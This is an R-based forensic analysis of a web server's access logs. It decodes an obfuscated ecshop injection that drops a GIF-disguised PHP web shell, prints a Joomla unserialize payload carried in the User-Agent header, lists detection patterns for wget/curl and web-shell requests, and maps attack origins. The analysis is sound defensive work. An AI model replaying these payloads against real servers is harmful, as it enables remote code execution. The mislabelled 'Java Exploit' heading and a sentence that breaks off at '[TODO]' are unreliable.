0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878

Decoding these from hex (the short one is simply `'/*`; the long one is shown here) gives:

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ215c2hpcHMucGhwJywnR0lGODlhIDw/cGhwCiAgICAkZiA9IG5ldyBSZWZsZWN0aW9uRnVuY3Rpb24oImFzc2VydCIpOwogICAgJGYtPmludm9rZUFyZ3MoYXJyYXkoIiRfUE9TVFtfXSIpKTsKPz5zeXN0ZW0nKQ=='));//}xxx

It appears that whatever is inside that base64_decode() call is executed as PHP, so let's find out what's in it:

file_put_contents('myships.php','GIF89a <?php\n    $f = new ReflectionFunction("assert");\n    $f->invokeArgs(array("$_POST[_]"));\n?>system')

So this injects some PHP that ends up saving a file (myships.php) that appears to look like a GIF file, but in reality, which is difficult to tell without dissecting the ecshop codebase, either executes POST variables as PHP or calls a system() call on some input. Either way, it's creating, through a very unique vector (HTTP Referer -> PHP Serialization Issue -> SQL Injection -> Obfuscated PHP Injection -> Save File), a PHP script that can do some form of remote code execution on a server.

Looking for this in the HTTPD logs again:

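# fixed=TRUE: the pattern is a literal file name, so "." must not act as a
# regex wildcard.
httpd_data[grep("myships.php", httpd_data$Request, fixed=TRUE),]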
##                                                                                                                                                               Raw
## 24017 [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24018  [IPREDACTED] - - [23/Sep/2018:18:32:26 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24674 [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24675  [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25611 [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25612  [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
##                 File.Name
## 24017 access_log-20180930
## 24018 access_log-20180930
## 24674 access_log-20180930
## 24675 access_log-20180930
## 25611 access_log-20180930
## 25612 access_log-20180930
##                                                                                                                                                            Raw.Split
## 24017 [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018  [IPREDACTED], -, -, [23/Sep/2018:18:32:26, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24675  [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612  [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##            IP.Address                Date                    Request
## 24017 [IPREDACTED] 2018-09-23 18:32:25 GET //myships.php HTTP/1.1
## 24018 [IPREDACTED] 2018-09-23 18:32:26  GET /myships.php HTTP/1.1
## 24674 [IPREDACTED] 2018-09-24 11:26:07 GET //myships.php HTTP/1.1
## 24675 [IPREDACTED] 2018-09-24 11:26:07  GET /myships.php HTTP/1.1
## 25611 [IPREDACTED] 2018-09-25 10:32:10 GET //myships.php HTTP/1.1
## 25612 [IPREDACTED] 2018-09-25 10:32:10  GET /myships.php HTTP/1.1
##       Response.Code Response.Length HTTP.Referer
## 24017           302             214            -
## 24018           404             209            -
## 24674           302             214            -
## 24675           404             209            -
## 25611           302             214            -
## 25612           404             209            -
##                                                            User.Agent
## 24017 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24675 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
##       Country.Code
## 24017           CN
## 24018           CN
## 24674           CN
## 24675           CN
## 25611           CN
## 25612           CN

They do follow up by requesting the file they are attempting to create: each `//myships.php` attempt is immediately followed by a `GET /myships.php`, which returns a 404 here.

Java Exploit

# Rows whose User-Agent carries the serialized Joomla object payload; the
# JSimplepieFactory / JDatabaseDriverMysql class names are its marker.
# Printed in full so the Raw column shows the whole header.
httpd_data[grepl("(JSimplepieFactory|JDatabaseDriverMysql)", httpd_data$User.Agent), ]
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Raw
## 6711  [IPREDACTED] - - [04/Sep/2018:02:30:30 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## 42245  [IPREDACTED] - - [13/Oct/2018:21:52:01 +0000] "GET / HTTP/1.1" 302 203 "-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86"
##                 File.Name
## 6711  access_log-20180909
## 42245 access_log-20181014
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Raw.Split
## 6711  [IPREDACTED], -, -, [04/Sep/2018:02:30:30, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245  [IPREDACTED], -, -, [13/Oct/2018:21:52:01, +0000], GET / HTTP/1.1, 302, 203, -, }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
##            IP.Address                Date        Request Response.Code
## 6711  [IPREDACTED] 2018-09-04 02:30:30 GET / HTTP/1.1           302
## 42245  [IPREDACTED] 2018-10-13 21:52:01 GET / HTTP/1.1           302
##       Response.Length HTTP.Referer
## 6711              203            -
## 42245             203            -
##                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            User.Agent
## 6711  }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
## 42245 }__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:4:\\"\\\\0\\\\0\\\\0a\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:5:\\"cache\\";b:1;s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:10:\\"javascript\\";i:9999;s:8:\\"feed_url\\";s:54:\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\";}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";i:1;}\\xf0\\x9d\\x8c\\x86
##       Country.Code
## 6711          <NA>
## 42245           UA

Looking at this exploit, it seems very similar to the previous one, though perhaps less complicated: a serialization exploit that relies on null-character termination issues, combined with SQL injection. Attacks have definitely gotten more complicated, but are not completely esoteric yet, as people are trying to both [TODO]

https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/

HTTP Header Patterns, Malware Retrieval

Building off the previous attacks, it becomes apparent that there are a few indicators of an attack, such as the “User-Agent” HTTP header, URLs present in the request, attempts to trigger some form of a drop to a shell (usually through PHP calls), or attempts to execute “wget” or “curl” to retrieve malware and execute it with GNU bash.

Unfortunately, all of the “wget” and “curl” based attacks were 404s when attempting to retrieve the payloads, which means that the attacker only opens up the links for short periods of time. It would be an interesting research endeavor to create a script that retrieves the malware at the moment it is requested from the Apache server (being absolutely careful not to execute anything, since these requests try to exploit misuse of semicolons and other delimiters), building up a pool of malware samples to examine.

# User-Agent strings longer than 200 characters: the serialized payload
# above plus a handful of concatenated browser strings.
with(httpd_data, User.Agent[nchar(as.character(User.Agent)) > 200])
##  [1] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [2] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [3] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [4] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
##  [5] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [6] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [7] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [8] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoMozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"                                                                                                                                                                                                                                                                                                                 
##  [9] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"                                                                                                                                                                                                                                                                                                                                            
## [10] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; SE 2.X MetaSr 1.0)"                                                                                                                                                                                                                                                                                                                                            
## [11] "}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:4:\\\"\\\\0\\\\0\\\\0a\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:5:\\\"cache\\\";b:1;s:19:\\\"cache_name_function\\\";s:6:\\\"assert\\\";s:10:\\\"javascript\\\";i:9999;s:8:\\\"feed_url\\\";s:54:\\\"eval(base64_decode($_POST[111]));JFactory::get();exit;\\\";}i:1;s:4:\\\"init\\\";}}s:13:\\\"\\\\0\\\\0\\\\0connection\\\";i:1;}\\xf0\\x9d\\x8c\\x86"
## [12] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"                                                                                                                                                                                                                                                                                                                                            
## [13] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"                                                                                                                                                                                                                                                                                                                                            
## [14] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BRI/1; IPH [IPREDACTED]19; BRI/2)"
# Heuristic attack filters over the parsed httpd log. Each is a plain
# regular-expression match on one column, so they are indicators rather
# than proof: "http" catches request lines that embed a URL, wget/curl
# catches requests that try to fetch a second stage, the PHP list is a fixed
# set of file names (presumably dropped web shells seen earlier), and the
# User-Agent pattern catches the "LMAO/2.0" and "Hakai/2.0" strings.
http_attack_records <- httpd_data[grepl("http", httpd_data$Request), ]
wget_attack_records <- httpd_data[grepl("(wget|curl)", httpd_data$Request), ]
php_attack_records <- httpd_data[
    grepl(
        "/(shell|sheep|wshell|xshell|zuoshou|zshmindex|ceshi|she|sha)\\.php",
        httpd_data$Request
    ),
]
ua_attack_records <- httpd_data[
    grepl("(LMAO|Hakai)/2.0", httpd_data$User.Agent),
]

# Every flagged request in one frame; a request that trips several filters
# appears once per filter.
attack_records <- rbind(
    php_attack_records, wget_attack_records,
    http_attack_records, ua_attack_records
)

# Widen to every request from any address that tripped a filter, whether or
# not that particular request looked like an attack.
new_attack_records <- httpd_data[
    httpd_data$IP.Address %in% attack_records$IP.Address,
]

new_req_attack_records <- new_attack_records[
    grepl("(LMAO|Hakai)/2.0", new_attack_records$Request),
]

new_ua_attack_records <- new_attack_records[
    grepl("(LMAO|Hakai)/2.0", new_attack_records$User.Agent),
]

Mapping Attacks

Overall Map

# Choropleth of hits per country for every request from a flagged address.
g <- world_mapper(country_code_cleanup(new_attack_records$Country.Code)) +
    labs(
        title = paste0(
            site_name, ": HTTPD Attack GeoIP Lookup (Overall)", collapse = ""
        ),
        fill = "Hits", x = "", y = ""
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar")
g

plot of chunk attack_graph

URL Present Map

# Choropleth of hits per country for requests whose request line embeds a URL.
g <- world_mapper(country_code_cleanup(http_attack_records$Country.Code)) +
    labs(
        title = paste0(
            site_name, ": HTTPD Attack GeoIP Lookup (URL present)", collapse = ""
        ),
        fill = "Hits", x = "", y = ""
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar")
g

plot of chunk attack_graph_02

wget/curl Attempts Map

# Choropleth of hits per country for requests that try to run wget or curl.
g <- world_mapper(country_code_cleanup(wget_attack_records$Country.Code)) +
    labs(
        title = paste0(
            site_name, ": HTTPD Attack GeoIP Lookup (wget/curl attempts)",
            collapse = ""
        ),
        fill = "Hits", x = "", y = ""
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar")
g

plot of chunk attack_graph_03

Identified PHP Functions Map

# Choropleth of hits per country for requests aimed at the listed PHP files.
g <- world_mapper(country_code_cleanup(php_attack_records$Country.Code)) +
    labs(
        title = paste0(
            site_name, ": HTTPD Attack GeoIP Lookup (PHP Functions)",
            collapse = ""
        ),
        fill = "Hits", x = "", y = ""
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar")
g

plot of chunk attack_graph_04

Suspicious User-Agent Map

# Choropleth of hits per country for requests carrying the LMAO/Hakai
# User-Agent strings.
g <- world_mapper(country_code_cleanup(ua_attack_records$Country.Code)) +
    labs(
        title = paste0(
            site_name, ": HTTPD Attack GeoIP Lookup (Suspicious User-Agent)",
            collapse = ""
        ),
        fill = "Hits", x = "", y = ""
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar")
g

plot of chunk attack_graph_05

Animations

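turn_to_animation <- function(df) {
    # Collapse per-request rows into one row per (day, country) with a hit
    # count, padded so that every calendar day between the first and last
    # observed day is present (padding days carry NA Country.Code / Count,
    # presumably so the animation also shows quiet days).
    #
    # df:      data frame with a Date column that strftime() accepts and a
    #          Country.Code column. Rows whose Country.Code is NA are dropped
    #          by aggregate()'s default na.action, so unlocated hits are not
    #          counted.
    # Returns: data frame with Animate.Time (factor, "%Y-%m-%d" levels in
    #          chronological order), Country.Code, Count, the columns of
    #          country_code_db, and Country (a copy of Country.Name).
    # Raises:  an error when df has no row that can be bucketed.
    #
    # NOTE(review): strftime() formats in the session's local timezone while
    # the log timestamps are +0000, so day buckets follow the analyst's clock
    # rather than the log's; pass tz = "UTC" to strftime() if that matters.
    if (nrow(df) == 0L) {
        stop("turn_to_animation(): no rows to animate", call. = FALSE)
    }
    df$Animate.Time <- strftime(df$Date, format = "%Y-%m-%d")

    # Count hits per day and country; Count only exists so the formula has a
    # response column for length() to run over.
    df$Count <- rep(0, nrow(df))
    agg_df <- aggregate(
        Count ~ as.factor(Animate.Time) + Country.Code,
        data = df, FUN = length
    )
    names(agg_df) <- c("Animate.Time", "Country.Code", "Count")
    if (nrow(agg_df) == 0L) {
        stop(
            "turn_to_animation(): no rows with a Country.Code to animate",
            call. = FALSE
        )
    }

    # Pad the calendar on Date rather than by stepping a local-time POSIXlt
    # by 24*60*60 seconds: across a DST change that step drifts by an hour,
    # the padded labels become "YYYY-MM-DD HH:MM:SS", never match the
    # "%Y-%m-%d" keys, and those days silently vanish from the merge.
    seen_days <- as.Date(as.character(agg_df$Animate.Time))
    all_df <- data.frame(
        Animate.Time = as.factor(seq(min(seen_days), max(seen_days), by = "day"))
    )

    # Left join keeps the padding days (NA Country.Code / Count).
    all_time_df <- merge(
        all_df, agg_df, all.x = TRUE, by = "Animate.Time"
    )

    # Attach the country name from the shared lookup table; merge() joins on
    # the column names the two frames share (Country.Code here).
    all_time_df <- merge(all_time_df, country_code_db, all.x = TRUE)
    all_time_df$Country <- all_time_df$Country.Name
    all_time_df
}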

Animate Attacks

# Daily frames of attack hits per country; the day label is pinned to a plot
# corner and transition_manual (gganimate) steps through the days.
g <- world_mapper(turn_to_animation(new_attack_records)) +
    labs(
        title = paste0(site_name, ": HTTPD Attack GeoIP Lookup", collapse = ""),
        fill = "Hits", x = "", y = ""
    ) +
    geom_label(
        aes(x = Inf, y = Inf, label = Animate.Time),
        vjust = "inward", hjust = "inward",
        colour = "#808080", fill = "#FFFFFF", label.size = 0
    ) +
    scale_fill_continuous(low = "#300000", high = "#E00000", guide = "colorbar") +
    transition_manual(Animate.Time)
g

plot of chunk animate_attacks

Animate Hits

# Same daily animation over every request in the log (green palette so it
# is not confused with the attack maps).
g <- world_mapper(turn_to_animation(httpd_data)) +
    labs(
        title = paste0(site_name, ": HTTPD: Hits by Country", collapse = ""),
        fill = "Hits", x = "", y = ""
    ) +
    geom_label(
        aes(x = Inf, y = Inf, label = Animate.Time),
        vjust = "inward", hjust = "inward",
        colour = "#808080", fill = "#FFFFFF", label.size = 0
    ) +
    scale_fill_continuous(low = "#003000", high = "#00E000", guide = "colorbar") +
    transition_manual(Animate.Time)
g